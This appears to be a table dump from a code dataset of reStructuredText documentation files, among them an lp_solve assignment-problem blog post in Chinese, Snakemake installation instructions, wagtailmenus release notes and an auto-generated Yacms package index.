hexsha stringlengths 40 40 | size int64 5 1.05M | ext stringclasses 588 values | lang stringclasses 305 values | max_stars_repo_path stringlengths 3 363 | max_stars_repo_name stringlengths 5 118 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count float64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringdate 2015-01-01 00:00:35 2022-03-31 23:43:49 ⌀ | max_stars_repo_stars_event_max_datetime stringdate 2015-01-01 12:37:38 2022-03-31 23:59:52 ⌀ | max_issues_repo_path stringlengths 3 363 | max_issues_repo_name stringlengths 5 118 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count float64 1 134k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 363 | max_forks_repo_name stringlengths 5 135 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count float64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringdate 2015-01-01 00:01:02 2022-03-31 23:27:27 ⌀ | max_forks_repo_forks_event_max_datetime stringdate 2015-01-03 08:55:07 2022-03-31 23:59:24 ⌀ | content stringlengths 5 1.05M | avg_line_length float64 1.13 1.04M | max_line_length int64 1 1.05M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3e5a22cd31c84f5c49aaad27a9d773335fba8cb8 | 4,463 | rst | reStructuredText | blogger/2011/01/01/python-lpsolve.rst | hoamon/www-hoamon-info | 4260057d8c63abb3b5f52f6cce3d236c312a5834 | [
"BSD-3-Clause"
] | null | null | null | blogger/2011/01/01/python-lpsolve.rst | hoamon/www-hoamon-info | 4260057d8c63abb3b5f52f6cce3d236c312a5834 | [
"BSD-3-Clause"
] | null | null | null | blogger/2011/01/01/python-lpsolve.rst | hoamon/www-hoamon-info | 4260057d8c63abb3b5f52f6cce3d236c312a5834 | [
"BSD-3-Clause"
] | null | null | null | 指派問題使用 python + lp_solve 解決
================================================================================
指派問題乃線性規劃的一種特例,它的特性是不須強調解為 0-1 變數或整數值,但最後算出來它卻一定就是 0 或 1
,只是這種說法是學理上的,當我們使用程式來計算時,往往因為這些工具在計算過程中使用數值分析的方法,造成解的結果只會接近 0 或是 接近 1 ,而不是純正的
0 或 1。
這也就是我在第 73 行中,使用 v > 0 而不是 v == 1 的原因,如果是寫 v == 1 的話,有些 v 值是 0.999999
的,就不會顯現了。事實上,使用 v > 0.5 會更好。不過,我最後檢查時,發現 > 0 就可以秀出這 50 個 x 的值,也就算了。
lp_solve 函式庫安裝方法請見`舊文`_。
::
** 1 ****# -*- coding: utf8 -*-**
** 2 ****""" 問題: **
** 3 **** **
** 4 **** 指定 0, 1, 2, ..., 49 等 50 個不可重複的數字給 x0 ~ x49,例如 x0 = 12,
x1 = 33, ...**
** 5 **
** 6 **** y = sin(1*x0) + sin(2*x1) + sin(3*x2) + ... +
sin(50*x49)**
** 7 **
** 8 **** 求解 y 之最大值?**
** 9 **
**10 **** 解法:**
**11 **
**12 **** 此問題可視為一種指派問題,也就是說有 0 ~ 49 等員工,要放到 x0 ~ x49 的職位去,**
**13 **** 這樣決策變數就會變成 p00(值為 1 代表 x0=0), p01(值為 1 代表 x1=0),**
**14 **** p02 , ..., p49_49 等 2500 個決策變數,且其值必為 0 或 1 。**
**15 **
**16 **** 雖然目標函式看起來是非線性的,但其實是線性的, y 函式的係數應該長得如下:**
**17 **
**18 **** x0 x1 x2 ...**
**19 **** 0 0(C00) 0(C01) 0(C02) ...**
**20 **** 1 0.84(C10) 0.91(C11) 0.14(C12) ...**
**21 **** 2 0.91(C20) -0.76(C21) -0.28(C22) ...**
**22 **** ... ... ... ... ...**
**23 **
**24 **** 所以如果決策變數是 p20 = p01 = p12 = 1,其餘為 0 ,則代表 x0 = 2,x1 =
0,x2 = 1,**
**25 **** 這樣 y = 0.91 + 0 + 0.14 = 1.05 。**
**26 **
**27 **** 所以目標式可以寫成 y = C00 * p00 + C01 * p01 + ... + C49_49 *
p49_49 。**
**28 **
**29 **** 最後再加上限制式**
**30 **** **
**31 **** p00 + p01 + ... + p0_49 = 1**
**32 **** p10 + p11 + ... + p1_49 = 1**
**33 **** ...**
**34 **** p49_0 + p49_1 + ... + p49_49 = 1**
**35 **
**36 **** p00 + p10 + ... + p49_0 = 1**
**37 **** p01 + p11 + ... + p49_1 = 1**
**38 **** ...**
**39 **** p0_49 + p1_49 + ... + p49_49 = 1**
**40 **
**41 **** 等 100 條限制式後,就能求 y 的最佳解。**
**42 **
**43 ****"""**
**44 ****from** math **import** sin
**45 ****import** lpsolve55 **as** L
**46 **
**47 **LENGTH = **50**
**48 **C = []
**49 **
**50 ****for** i **in** xrange(LENGTH):
**51 ** **for** j **in** xrange(LENGTH):
**52 ** C.append(-**1***sin((j+**1**)*i)) **# lp_solve
預設解極小值問題,所以我把目標函數係數全乘以 -1**
**53 **
**54 **lp = L.lpsolve(**'make_lp'**, **0**, LENGTH****2**)
**55 **L.lpsolve(**'set_verbose'**, lp, L.IMPORTANT)
**56 **ret = L.lpsolve(**'set_obj_fn'**, lp, C)
**57 **
**58 ****for** i **in** xrange(LENGTH):
**59 ** p = [**0**,] * (LENGTH ** **2**)
**60 ** **for** j **in** xrange(i*LENGTH, i*LENGTH+LENGTH): p[j] =
**1**
**61 ** ret = L.lpsolve(**'add_constraint'**, lp, p, L.EQ, **1**)
**62 **
**63 ** p = [**0**,] * (LENGTH ** **2**)
**64 ** **for** j **in** xrange(**0**, LENGTH):
**65 ** p[j*LENGTH+i] = **1**
**66 ** ret = L.lpsolve(**'add_constraint'**, lp, p, L.EQ, **1**)
**67 **
**68 **L.lpsolve(**'solve'**, lp)
**69 ****print** **u'目標值: %s'** % (L.lpsolve(**'get_objective'**, lp)
* -**1**) **#要乘以 -1 來還原目標值。**
**70 **vars = L.lpsolve(**'get_variables'**, lp)[**0**]
**71 ****print** **u'決策變數: %s'** % vars
**72 ****for** (ij, v) **in** enumerate(vars):
**73 ** **if** v > 0:
**74 ** i = ij / LENGTH
**75 ** j = ij % LENGTH
**76 ** **print** **'x%s = %s, '** % (j, i),
**77 ** **if** i % **5** + **1** == 5: print
目標值最佳解為 47.8620523191 。
各變數值如下:
x21 = 0, x32 = 1, x47 = 2, x33 = 3, x1 = 4,
x37 = 5, x16 = 6, x45 = 7, x11 = 8, x25 = 9,
x18 = 10, x30 = 11, x7 = 12, x17 = 13, x0 = 14,
x41 = 15, x36 = 16, x22 = 17, x49 = 18, x9 = 19,
x44 = 20, x26 = 21, x43 = 22, x13 = 23, x42 = 24,
x35 = 25, x8 = 26, x20 = 27, x39 = 28, x40 = 29,
x29 = 30, x10 = 31, x34 = 32, x4 = 33, x2 = 34,
x38 = 35, x24 = 36, x6 = 37, x46 = 38, x5 = 39,
x27 = 40, x28 = 41, x14 = 42, x23 = 43, x48 = 44,
x19 = 45, x31 = 46, x12 = 47, x15 = 48, x3 = 49,
=== 後記 ===
經老師指導後,使用
ret = L.lpsolve('set_binary', lp, [1,]*(LENGTH**2)) #大約加在第 59 行後
令決策變數為 0-1 二元變數後,計算時間馬上減少了 60% 。
.. _舊文: http://hoamon.blogspot.com/2007/10/lpsolve.html
.. author:: default
.. categories:: chinese
.. tags:: lp, python, math, cmclass
.. comments:: | 35.141732 | 80 | 0.406229 |
bc4607d07b13bc3ecf5d07b6763548747b90a153 | 643 | rst | reStructuredText | docs/tools/tools.rst | hopper-maker/openxc-python | 2054c3d7a7ba09b8f0eeecc2348185857dc22f5f | [
"BSD-3-Clause"
] | 81 | 2015-01-17T04:21:55.000Z | 2022-01-12T16:54:26.000Z | docs/tools/tools.rst | hopper-maker/openxc-python | 2054c3d7a7ba09b8f0eeecc2348185857dc22f5f | [
"BSD-3-Clause"
] | 84 | 2015-01-14T20:17:44.000Z | 2020-10-19T21:46:25.000Z | docs/tools/tools.rst | hopper-maker/openxc-python | 2054c3d7a7ba09b8f0eeecc2348185857dc22f5f | [
"BSD-3-Clause"
] | 32 | 2015-03-08T14:03:53.000Z | 2022-01-04T12:21:59.000Z | Command Line Tools
===================
With all tools, the library will attempt to autodetect the payload format
being used by the VI. If it's not sending any messages this is not possible, so
you may need to provide the current payload format explicitly with the
``--format`` flag. For example, here's a command to change the
passthrough status of bus 1, but with the payload format for the request
explicitly set the protocol buffers:
.. code-block:: bash
$ openxc-control set --bus 1 --passthrough --format protobuf
The following links describe the available openxc-python commands.
.. toctree::
:maxdepth: 1
:glob:
*
| 29.227273 | 79 | 0.724728 |
948e4731a6d86ced500bf5c43f58b40f036037f6 | 595 | rst | reStructuredText | docs/source/releases/index.rst | cazgp/wagtailmenus | b0a6acb281227c93b3b4f11265366da0dada4248 | [
"MIT"
] | 329 | 2016-01-28T16:20:16.000Z | 2022-01-31T03:43:54.000Z | docs/source/releases/index.rst | cazgp/wagtailmenus | b0a6acb281227c93b3b4f11265366da0dada4248 | [
"MIT"
] | 337 | 2016-04-15T11:09:44.000Z | 2022-01-31T10:01:32.000Z | docs/source/releases/index.rst | cazgp/wagtailmenus | b0a6acb281227c93b3b4f11265366da0dada4248 | [
"MIT"
] | 105 | 2016-06-17T15:45:07.000Z | 2022-01-21T21:23:56.000Z | Release notes
=============
.. toctree::
:maxdepth: 1
3.1
3.0.2
3.0.1
3.0
2.13.1
2.13
2.12.1
2.12
2.11.1
2.11
2.10.1
2.10.0
2.9.0
2.8.0
2.7.1
2.7.0
2.6.0
2.5.2
2.5.1
2.5.0
2.4.3
2.4.2
2.4.1
2.4.0
2.3.2
2.3.1
2.3.0
2.2.3
2.2.2
2.2.1
2.2.0
2.1.4
2.1.3
2.1.2
2.1.1
2.1.0
2.0.3
2.0.2
2.0.1
2.0.0
Release notes for versions preceding ``v2.0.0`` can be found on GitHub:
https://github.com/rkhleics/wagtailmenus/releases?after=v2.0.0
| 11.666667 | 71 | 0.430252 |
bfbfd779243c8dd2f06f2c09c6a6ad7e0d554291 | 2,784 | rst | reStructuredText | docs/getting_started/installation.rst | CIMAC-CIDC/cidc-snakemake | 3a44501c5fbf1428f42ff6a47e6bc5fa7b369cf8 | [
"MIT"
] | null | null | null | docs/getting_started/installation.rst | CIMAC-CIDC/cidc-snakemake | 3a44501c5fbf1428f42ff6a47e6bc5fa7b369cf8 | [
"MIT"
] | null | null | null | docs/getting_started/installation.rst | CIMAC-CIDC/cidc-snakemake | 3a44501c5fbf1428f42ff6a47e6bc5fa7b369cf8 | [
"MIT"
] | null | null | null | .. getting_started-installation:
============
Installation
============
Snakemake is available on PyPi as well as through Bioconda and also from source code.
You can use one of the following ways for installing Snakemake.
Installation via Conda
======================
This is the recommended way to install Snakemake,
because it also enables Snakemake to :ref:`handle software dependencies of your
workflow <integrated_package_management>`.
First, you have to install the Miniconda Python3 distribution.
See `here <https://conda.io/docs/install/quick.html>`_ for installation instructions.
Make sure to ...
* Install the **Python 3** version of Miniconda.
* Answer yes to the question whether conda shall be put into your PATH.
Then, you can install Snakemake with
.. code-block:: console
$ conda install -c bioconda -c conda-forge snakemake
from the `Bioconda <https://bioconda.github.io>`_ channel.
A minimal version of Snakemake which only depends on the bare necessities can be installed with
.. code-block:: console
$ conda install -c bioconda -c conda-forge snakemake-minimal
Note that Snakemake is available via Bioconda for historical, reproducibility, and continuity reasons.
However, it is easy to combine Snakemake installation with other channels, e.g., by prefixing the package name with ``::bioconda``, i.e.,
.. code-block:: console
$ conda install -c conda-forge bioconda::snakemake bioconda::snakemake-minimal
Global Installation
===================
With a working Python ``>=3.5`` setup, installation of Snakemake can be performed by issuing
.. code-block:: console
$ easy_install3 snakemake
or
.. code-block:: console
$ pip3 install snakemake
in your terminal.
Installing in Virtualenv
========================
To create an installation in a virtual environment, use the following commands:
.. code-block:: console
$ virtualenv -p python3 .venv
$ source .venv/bin/activate
$ pip install snakemake
Installing from Source
======================
We recommend installing Snakemake into a virtualenv instead of globally.
Use the following commands to create a virtualenv and install Snakemake.
Note that this will install the development version and as you are installing from the source code, we trust that you know what you are doing and how to checkout individual versions/tags.
.. code-block:: console
$ git clone https://bitbucket.org/snakemake/snakemake.git
$ cd snakemake
$ virtualenv -p python3 .venv
$ source .venv/bin/activate
$ python setup.py install
You can also use ``python setup.py develop`` to create a "development installation" in which no files are copied but a link is created and changes in the source code are immediately visible in your ``snakemake`` commands.
| 30.933333 | 221 | 0.733118 |
cabd508fe92a378be28ef06c99b53195df5e997e | 593 | rst | reStructuredText | Documentation/source/reference/aft-string/functions/aft-ascii-is-whitespace.rst | Vavassor/AdString | 7558bb3056441909b83a0e67828cc4b1509f5332 | [
"CC0-1.0"
] | null | null | null | Documentation/source/reference/aft-string/functions/aft-ascii-is-whitespace.rst | Vavassor/AdString | 7558bb3056441909b83a0e67828cc4b1509f5332 | [
"CC0-1.0"
] | 3 | 2019-01-15T22:46:23.000Z | 2019-01-24T21:20:09.000Z | Documentation/source/reference/aft-string/functions/aft-ascii-is-whitespace.rst | Vavassor/AdString | 7558bb3056441909b83a0e67828cc4b1509f5332 | [
"CC0-1.0"
] | null | null | null | aft_ascii_is_whitespace
=======================
.. c:function:: bool aft_ascii_is_whitespace(char c)
Determine if a character is whitespace.
.. table:: Whitespace Characters
=============== ========
Name Literal
=============== ========
Carriage Return ``'\r'``
Form Feed ``'\f'``
Line Feed ``'\n'``
Space ``' '``
Tab ``'\t'``
Vertical Tab ``'\v'``
=============== ========
:param c: the character
:return: true if the character is whitespace
| 24.708333 | 52 | 0.406408 |
3aecdf7a5cff6fa307c6237a7233c59336b3ee3d | 864 | rst | reStructuredText | README.rst | keke8273/java-formula | 5c6fa2ada6de18ddce7dcde0d83ae741bf77e208 | [
"Apache-2.0"
] | null | null | null | README.rst | keke8273/java-formula | 5c6fa2ada6de18ddce7dcde0d83ae741bf77e208 | [
"Apache-2.0"
] | null | null | null | README.rst | keke8273/java-formula | 5c6fa2ada6de18ddce7dcde0d83ae741bf77e208 | [
"Apache-2.0"
] | null | null | null | java
====
This state installs java to /opt and sets up the alternatives system to point
to the binaries under /opt. To use this state the java tarball(s) must be
downloaded manually and placed in the files directory.
Available states
================
.. contents::
:local:
``java.server_jre``
-------------------
Install the Oracle Java server jre, the tarball must be named `server_jre.tgz`
and placed in the files directory.
``java.server_jdk``
-------------------
Install the Oracle Java jdk
Example Pillar
==============
You can specify the ``source``, ``source_hash``, and ``home`` in your `pillar` file, like so:
.. code-block:: yaml
java:
jre:
source: http://java.com...
source_hash: sha1=SHA1OFDOWNLOAD
home: /usr/local
jdk:
source: http://java.com...
source_hash: sha1=SHA1OFDOWNLOAD
| 21.6 | 93 | 0.626157 |
cc2855579dea30f19e13ea70d6da09ab2e45f11f | 992 | rst | reStructuredText | doc/cookbook/shell-debuggingdatabase.rst | getong/zotonic | f8435a957c3684221086e318e9a30361dd75eaeb | [
"Apache-2.0"
] | 1 | 2015-07-24T13:05:26.000Z | 2015-07-24T13:05:26.000Z | doc/cookbook/shell-debuggingdatabase.rst | getong/zotonic | f8435a957c3684221086e318e9a30361dd75eaeb | [
"Apache-2.0"
] | null | null | null | doc/cookbook/shell-debuggingdatabase.rst | getong/zotonic | f8435a957c3684221086e318e9a30361dd75eaeb | [
"Apache-2.0"
] | null | null | null | Debugging db (query) issues
===========================
Techniques for finding root cause when queries are involved.
Why
---
When you face unexpected behavior as a result of some database query
(z_db:q et al), you either have to hunt down the queries and re-run
them by hand, which is really time consuming and painful, or, which
this cookbook will detail, have postgresql log the queries for you.
The principal documentation and with more details, may be found here:
http://www.postgresql.org/docs/8.4/static/runtime-config-logging.html
Assumptions
-----------
A working system where you want to inspect the db queries being run.
How
---
Edit your ``postgresql.conf`` file, enabling ``logstatement =
'all'``. This file has a lot of options commented out, with comments
which you may review. Options of interest in this scenario all begin
with "log" (or similar).
By having ``log_destination = 'stderr'`` and ``logging_collector =
on``, you can capture your logging output to file.
| 30.060606 | 69 | 0.734879 |
4e65d1518ed9b1b95956a29b5421115dbb39d893 | 863 | rst | reStructuredText | docs/source/02-Add-Custom-Style-Sheet/index.rst | MacHu-GWU/learn_sphinx-project | 2b020deef9f79b11dd4532ff351a46d607203e30 | [
"MIT"
] | null | null | null | docs/source/02-Add-Custom-Style-Sheet/index.rst | MacHu-GWU/learn_sphinx-project | 2b020deef9f79b11dd4532ff351a46d607203e30 | [
"MIT"
] | null | null | null | docs/source/02-Add-Custom-Style-Sheet/index.rst | MacHu-GWU/learn_sphinx-project | 2b020deef9f79b11dd4532ff351a46d607203e30 | [
"MIT"
] | null | null | null | Add Custome Style Sheet
==============================================================================
- This is :red:`Red` text.
- This is :blue:`Blue` text.
- This is :green:`Green` text.
1. Add your custom ``.css`` file. it should sitting at ``./_static/css/xxx.css``, let's say ``custom-style.css``, in this Style Sheet, you should assign diffrent style by class name.
2. Tell sphinx to add this Style Sheet in ``conf.py``::
def setup(app):
app.add_stylesheet('css/custom-style.css')
3. Define the class name with a role in ``.custom-style.rst`` file (Name doesn't matter, but has to starts with ``.``. Then everytime you use ``:rolename:`Some Text`, you will give ``Some Text`` a pre-defined html tag class.
4. Include this role definition ``.rst`` file everywhere in ``conf.py``::
rst_prolog = '\n.. include:: .custom-style.rst\n'
Done! | 47.944444 | 224 | 0.618772 |
71bcf42359747f80918d13bb98b32b1b7fdf2c14 | 438 | rst | reStructuredText | API/env/lib/python3.6/site-packages/cmake/data/share/cmake-3.15/Help/variable/CMAKE_XCODE_SCHEME_DISABLE_MAIN_THREAD_CHECKER.rst | tirth2212/Attendance-Log | de749bb12eccb5da069824be976e8fbdafec4eda | [
"MIT"
] | 107 | 2021-08-28T20:08:42.000Z | 2022-03-22T08:02:16.000Z | API/env/lib/python3.6/site-packages/cmake/data/share/cmake-3.15/Help/variable/CMAKE_XCODE_SCHEME_DISABLE_MAIN_THREAD_CHECKER.rst | tirth2212/Attendance-Log | de749bb12eccb5da069824be976e8fbdafec4eda | [
"MIT"
] | 30 | 2020-04-15T19:37:40.000Z | 2020-04-22T21:19:35.000Z | API/env/lib/python3.6/site-packages/cmake/data/share/cmake-3.15/Help/variable/CMAKE_XCODE_SCHEME_DISABLE_MAIN_THREAD_CHECKER.rst | tirth2212/Attendance-Log | de749bb12eccb5da069824be976e8fbdafec4eda | [
"MIT"
] | 98 | 2019-10-17T14:48:28.000Z | 2022-01-21T03:33:38.000Z | CMAKE_XCODE_SCHEME_DISABLE_MAIN_THREAD_CHECKER
----------------------------------------------
Whether to disable the ``Main Thread Checker``
in the Diagnostics section of the generated Xcode scheme.
This variable initializes the
:prop_tgt:`XCODE_SCHEME_DISABLE_MAIN_THREAD_CHECKER`
property on all targets.
Please refer to the :prop_tgt:`XCODE_GENERATE_SCHEME` target property
documentation to see all Xcode schema related properties.
| 33.692308 | 69 | 0.757991 |
4992f73358d544006612401536b4671242754d27 | 3,240 | rst | reStructuredText | docs/source/index.rst | NGC4676/mrf | baba888730706711c71dde426555fe27146b20db | [
"MIT"
] | 15 | 2019-08-23T17:31:33.000Z | 2021-05-28T14:26:23.000Z | docs/source/index.rst | NGC4676/mrf | baba888730706711c71dde426555fe27146b20db | [
"MIT"
] | 5 | 2019-10-24T16:30:29.000Z | 2021-08-03T18:51:09.000Z | docs/source/index.rst | NGC4676/mrf | baba888730706711c71dde426555fe27146b20db | [
"MIT"
] | 7 | 2019-08-13T13:21:10.000Z | 2021-10-16T20:44:44.000Z | MRF: Multi-Resolution Filtering
===============================
Multi-Resolution Filtering is a method for isolating faint, extended emission in `Dragonfly <http://dragonflytelescope.org>`_ data and other low resolution images. It is implemented in an open-source MIT licensed Python package ``mrf``. Please read `van Dokkum et al. (2019) <https://arxiv.org/abs/1910.12867>`_ for the methodology and description of implementation.
.. image:: https://img.shields.io/badge/license-MIT-blue
:target: https://opensource.org/licenses/mit-license.php
:alt: License
.. image:: https://readthedocs.org/projects/mrfiltering/badge/?version=latest
:target: https://mrfiltering.readthedocs.io/en/latest/?badge=latest
:alt: Documentation Status
.. image:: https://img.shields.io/badge/version-1.0.4-green
:alt: Version
.. image:: https://img.shields.io/badge/arXiv-1910.12867-blue
:target: https://arxiv.org/abs/1910.12867
:alt: arXiv
.. image:: https://img.shields.io/badge/GitHub-astrojacobli%2Fmrf-blue
:target: https://github.com/AstroJacobLi/mrf
:alt: GitHub Repo
.. image:: https://img.shields.io/github/repo-size/astrojacobli/mrf
:target: https://github.com/AstroJacobLi/mrf
:alt: Repo Size
Basic Usage
-----------
.. code-block:: python
from mrf.task import MrfTask
task = MrfTask('m101-df3-task.yaml')
img_lowres = 'M101_DF3_df_r.fits'
img_hires_b = 'M101_DF3_cfht_r.fits'
img_hires_r = 'M101_DF3_cfht_r.fits'
certain_gal_cat = 'gal_cat_m101.txt'
results = task.run(img_lowres, img_hires_b, img_hires_r, certain_gal_cat,
output_name='m101_df3', verbose=True)
results.lowres_final.display_image()
.. figure:: https://github.com/AstroJacobLi/mrf/raw/master/examples/M101-DF3/m101-df3-demo.png
:width: 640px
:align: center
:alt: alternate text
:figclass: align-center
Please check :ref:`Tutorials` for more details.
User Guide
-----------
.. toctree::
:maxdepth: 2
guide/install
tutorial/mrf-tutorial
.. toctree::
:maxdepth: 1
tutorial/configuration
tutorial/misc
license
guide/changelog
Index
------------------
* :ref:`modindex`
* :ref:`search`
Citation
--------
``mrf`` is a free software made available under the MIT License by `Pieter van Dokkum <http://pietervandokkum.com>`_ (initial development) and `Jiaxuan Li <https://astrojacobli.github.io>`_ (implementation, maintenance, and documentation). If you use this package in your work, please cite `van Dokkum et al. (2019) <https://arxiv.org/abs/1910.12867>`_.
You are welcome to report bugs in ``mrf`` via creating issues at https://github.com/AstroJacobLi/mrf/issues.
Need more help? Feel free to contact via pieter.vandokkum@yale.edu and jiaxuan_li@pku.edu.cn.
Acknowledgment
---------------
Many scripts and snippets are from `kungpao <https://github.com/dr-guangtou/kungpao>`_ (mainly written by `Song Huang <http://dr-guangtou.github.io>`_). `Johnny Greco <http://johnnygreco.github.io>`_ kindly shared his idea of the code structure. `Roberto Abraham <http://www.astro.utoronto.ca/~abraham/Web/Welcome.html>`_ found the first few bugs of this package and provided useful solutions. Here we appreciate their help! | 36.818182 | 424 | 0.708333 |
7a4e8c114fed84b9a14315f2b21e8d21e454d972 | 8,102 | rst | reStructuredText | docs/packages.rst | minhhoit/yacms | 39a9f1f2f8eced6d4cb89db36f3cdff89c18bdfe | [
"BSD-2-Clause"
] | null | null | null | docs/packages.rst | minhhoit/yacms | 39a9f1f2f8eced6d4cb89db36f3cdff89c18bdfe | [
"BSD-2-Clause"
] | null | null | null | docs/packages.rst | minhhoit/yacms | 39a9f1f2f8eced6d4cb89db36f3cdff89c18bdfe | [
"BSD-2-Clause"
] | null | null | null | ========
Packages
========
Below are auto-generated docs mostly covering each of the packages contained
within Yacms that are added to ``settings.INSTALLED_APPS``.
``Yacms.boot``
==================
.. automodule:: Yacms.boot
:members:
``Yacms.core``
==================
.. automodule:: Yacms.core
``Yacms.core.models``
-------------------------
.. automodule:: Yacms.core.models
:members:
``Yacms.core.managers``
---------------------------
.. automodule:: Yacms.core.managers
:members:
``Yacms.core.views``
------------------------
.. automodule:: Yacms.core.views
:members:
``Yacms.core.forms``
------------------------
.. automodule:: Yacms.core.forms
:members:
``Yacms.core.admin``
------------------------
.. automodule:: Yacms.core.admin
:members:
``Yacms.core.middleware``
-----------------------------
.. automodule:: Yacms.core.middleware
:members:
``Yacms.core.templatetags.Yacms_tags``
----------------------------------------------
.. automodule:: Yacms.core.templatetags.Yacms_tags
:members:
``Yacms.core.management.commands``
--------------------------------------
.. automodule:: Yacms.core.management.commands.createdb
:members:
``Yacms.core.request``
--------------------------
.. automodule:: Yacms.core.request
:members:
``Yacms.core.tests``
------------------------
.. automodule:: Yacms.core.tests
:members:
``Yacms.pages``
===================
.. automodule:: Yacms.pages
``Yacms.pages.models``
--------------------------
.. automodule:: Yacms.pages.models
:members:
``Yacms.pages.views``
-------------------------
.. automodule:: Yacms.pages.views
:members:
``Yacms.pages.admin``
-------------------------
.. automodule:: Yacms.pages.admin
:members:
``Yacms.pages.middleware``
------------------------------
.. automodule:: Yacms.pages.middleware
:members:
``Yacms.pages.templatetags.pages_tags``
-------------------------------------------
.. automodule:: Yacms.pages.templatetags.pages_tags
:members:
``Yacms.pages.page_processors``
-----------------------------------
.. automodule:: Yacms.pages.page_processors
:members:
``Yacms.generic``
=====================
.. automodule:: Yacms.generic
``Yacms.generic.models``
----------------------------
.. automodule:: Yacms.generic.models
:members:
``Yacms.generic.managers``
------------------------------
.. automodule:: Yacms.generic.managers
:members:
``Yacms.generic.fields``
----------------------------
.. automodule:: Yacms.generic.fields
:members:
``Yacms.generic.views``
---------------------------
.. automodule:: Yacms.generic.views
:members:
``Yacms.generic.forms``
---------------------------
.. automodule:: Yacms.generic.forms
:members:
``Yacms.generic.admin``
---------------------------
.. automodule:: Yacms.generic.admin
:members:
``Yacms.generic.templatetags.comment_tags``
-----------------------------------------------
.. automodule:: Yacms.generic.templatetags.comment_tags
:members:
``Yacms.generic.templatetags.disqus_tags``
-----------------------------------------------
.. automodule:: Yacms.generic.templatetags.disqus_tags
:members:
``Yacms.generic.templatetags.keyword_tags``
-----------------------------------------------
.. automodule:: Yacms.generic.templatetags.keyword_tags
:members:
``Yacms.generic.templatetags.rating_tags``
-----------------------------------------------
.. automodule:: Yacms.generic.templatetags.rating_tags
:members:
``Yacms.blog``
==================
.. automodule:: Yacms.blog
``Yacms.blog.models``
-------------------------
.. automodule:: Yacms.blog.models
:members:
``Yacms.blog.views``
------------------------
.. automodule:: Yacms.blog.views
:members:
``Yacms.blog.forms``
------------------------
.. automodule:: Yacms.blog.forms
:members:
``Yacms.blog.admin``
------------------------
.. automodule:: Yacms.blog.admin
:members:
``Yacms.blog.feeds``
------------------------
.. automodule:: Yacms.blog.feeds
:members:
``Yacms.blog.templatetags.blog_tags``
-----------------------------------------
.. automodule:: Yacms.blog.templatetags.blog_tags
:members:
``Yacms.blog.management.base``
----------------------------------
.. automodule:: Yacms.blog.management.base
:members:
``Yacms.blog.management.commands``
--------------------------------------
.. automodule:: Yacms.blog.management.commands.import_rss
:members:
.. automodule:: Yacms.blog.management.commands.import_blogger
:members:
.. automodule:: Yacms.blog.management.commands.import_wordpress
:members:
.. automodule:: Yacms.blog.management.commands.import_tumblr
:members:
``Yacms.accounts``
======================
.. automodule:: Yacms.accounts
:members:
``Yacms.accounts.views``
----------------------------
.. automodule:: Yacms.accounts.views
:members:
``Yacms.accounts.forms``
----------------------------
.. automodule:: Yacms.accounts.forms
:members:
``Yacms.accounts.templatetags.accounts_tags``
-------------------------------------------------
.. automodule:: Yacms.accounts.templatetags.accounts_tags
:members:
``Yacms.accounts.admin``
----------------------------
.. automodule:: Yacms.accounts.admin
:members:
``Yacms.forms``
===================
.. automodule:: Yacms.forms
``Yacms.forms.models``
-------------------------------
.. automodule:: Yacms.forms.models
:members:
``Yacms.forms.forms``
------------------------------
.. automodule:: Yacms.forms.forms
:members:
``Yacms.forms.page_processors``
----------------------------------------
.. automodule:: Yacms.forms.page_processors
:members:
``Yacms.forms.admin``
------------------------------
.. automodule:: Yacms.forms.admin
:members:
``Yacms.galleries``
=======================
.. automodule:: Yacms.galleries
``Yacms.galleries.models``
-------------------------------
.. automodule:: Yacms.galleries.models
:members:
``Yacms.galleries.admin``
-------------------------------
.. automodule:: Yacms.galleries.admin
:members:
``Yacms.conf``
==================
.. automodule:: Yacms.conf
:members:
``Yacms.conf.models``
-------------------------
.. automodule:: Yacms.conf.models
:members:
``Yacms.conf.forms``
------------------------
.. automodule:: Yacms.conf.forms
:members:
``Yacms.conf.admin``
------------------------
.. automodule:: Yacms.conf.admin
:members:
``Yacms.conf.context_processors``
-------------------------------------
.. automodule:: Yacms.conf.context_processors
:members:
``Yacms.template``
======================
.. automodule:: Yacms.template
:members:
``Yacms.template.loader_tags``
==================================
.. automodule:: Yacms.template.loader_tags
:members:
``Yacms.twitter``
=====================
.. automodule:: Yacms.twitter
``Yacms.twitter.models``
----------------------------
.. automodule:: Yacms.twitter.models
:members:
``Yacms.twitter.managers``
------------------------------
.. automodule:: Yacms.twitter.managers
:members:
``Yacms.twitter.templatetags.twitter_tags``
-----------------------------------------------
.. automodule:: Yacms.twitter.templatetags.twitter_tags
:members:
``Yacms.twitter.management.commands``
-----------------------------------------
.. automodule:: Yacms.twitter.management.commands.poll_twitter
:members:
``Yacms.utils``
===================
.. automodule:: Yacms.utils
.. automodule:: Yacms.utils.cache
:members:
.. automodule:: Yacms.utils.conf
:members:
.. automodule:: Yacms.utils.device
:members:
.. automodule:: Yacms.utils.docs
:members:
.. automodule:: Yacms.utils.email
:members:
.. automodule:: Yacms.utils.html
:members:
.. automodule:: Yacms.utils.importing
:members:
.. automodule:: Yacms.utils.models
:members:
.. automodule:: Yacms.utils.sites
:members:
.. automodule:: Yacms.utils.tests
:members:
.. automodule:: Yacms.utils.timezone
:members:
.. automodule:: Yacms.utils.urls
:members:
.. automodule:: Yacms.utils.views
:members:
| 17.128964 | 76 | 0.526166 |
dfb84a8d6980d32bb6a639fd6aeb9cae63079bc3 | 10,965 | rst | reStructuredText | docs/source/extensions.rst | d-sot/hdmf | 6df64fe9f2f8163d1c688561c4a5a7ae96ae7284 | [
"BSD-3-Clause-LBNL"
] | null | null | null | docs/source/extensions.rst | d-sot/hdmf | 6df64fe9f2f8163d1c688561c4a5a7ae96ae7284 | [
"BSD-3-Clause-LBNL"
